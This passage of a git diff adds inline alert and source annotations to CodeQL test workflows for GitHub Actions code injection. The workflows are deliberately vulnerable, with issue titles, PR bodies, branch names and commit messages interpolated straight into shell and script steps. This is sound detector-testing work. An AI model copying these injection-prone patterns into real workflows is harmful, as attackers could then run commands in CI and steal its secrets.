${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index b964bb78dac..fc56cbc5121 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -41,4 +41,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml index d6b7b2b1b0c..d075aecd67e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -42,4 +42,4 @@ jobs: steps: - id: sink # Should not be reported since job1 is not needed - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml index 5e767ce0239..348fe03ec72 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -1,20 +1,20 @@ on: issues env: - global_env: ${{ github.event.issue.title }} + global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] test: test jobs: echo-chamber: env: - job_env: ${{ github.event.issue.title }} + job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' - - run: echo '${{ github.event.issue.body }}' - - run: echo '${{ env.global_env }}' + - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical] - run: echo '${{ env.test }}' - - run: echo '${{ env.job_env }}' - - run: echo '${{ env.step_env }}' + - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical] env: - step_env: ${{ github.event.issue.title }} + step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml index b17a1fecbeb..bfb4c488862 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: ${{ github.event.comment.body == '/jira ticket' }} steps: - - run: echo ${{ github.event.comment.body }} + - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical] - name: Login uses: atlassian/gajira-login@v3 @@ -20,7 +20,7 @@ jobs: JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} - name: SearchParam - run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical] - name: Search id: search diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml index ad9187a3d6b..ad5d52fcb6b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -41,7 +41,7 @@ jobs: run: | echo "Checking issue body for profanities..." PROFANITIES_LIST="bad|disguting|horrible" - if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical] echo "Profanity detected in issue body. Please clean up the language." exit 1 else @@ -66,7 +66,7 @@ jobs: uses: actions/github-script@v5 with: script: | - const commentBody = "${{ github.event.comment.body }}"; + const commentBody = "${{ github.event.comment.body }}"; # $ Alert[actions/code-injection/critical] let response; if (commentBody.includes("hello")) { response = "Hello! How can I help you today?"; diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml index 826051dfc5a..bd378f61406 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -34,4 +34,4 @@ jobs: pr-message: 'Message that will be displayed on users first pr' - name: Log test executions run: | - echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml index 560e69f9e4b..3ab37e1e4db 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -11,4 +11,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.body }}" + - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml index d4ce7885669..01af6deeaf2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.review.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml index 5d288caad85..1b08e4a1855 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.comment.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 4ca3753f50c..da99a837568 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -6,12 +6,12 @@ jobs: steps: - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.head_ref }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml index 2006a7999da..97dfeb05c81 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -4,13 +4,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml index 8b7a6df009c..f459b9b5149 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml @@ -6,13 +6,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 0c4aa93c7a5..34c2f156a09 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0c4aa93c7a5..333af0376ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index a237856b6ce..3ef3f09bf56 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -8,4 +8,4 @@ jobs: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 0f87d1e9394..e4c6ec03144 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 39dfafcf023..4ef27dca557 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 5390612f105..087b116464e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} + source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} - - run: ${{ needs.test1.outputs.job_output }} + - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] + - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 94e8be89bdc..78f5c845d04 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" + echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index 8271f93d857..d1c7dedaa10 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/critical] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do + for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index 3128aacc93c..e08ab1a8455 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" + echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] cat << EOF - ${{ toJSON(github.event) }} + ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 5422ac4e987..1eb2797e31b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" + - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 5aeb9aac7c5..6d29df90955 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} + source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} + - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index d149df2bd7c..b58a9cb0aa2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} + run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 2e734076cb7..9cbfa20a6a2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index dc101c76944..151ae685df8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/code-injection/critical] id: set-ref run: | pr_num=$(jq -r 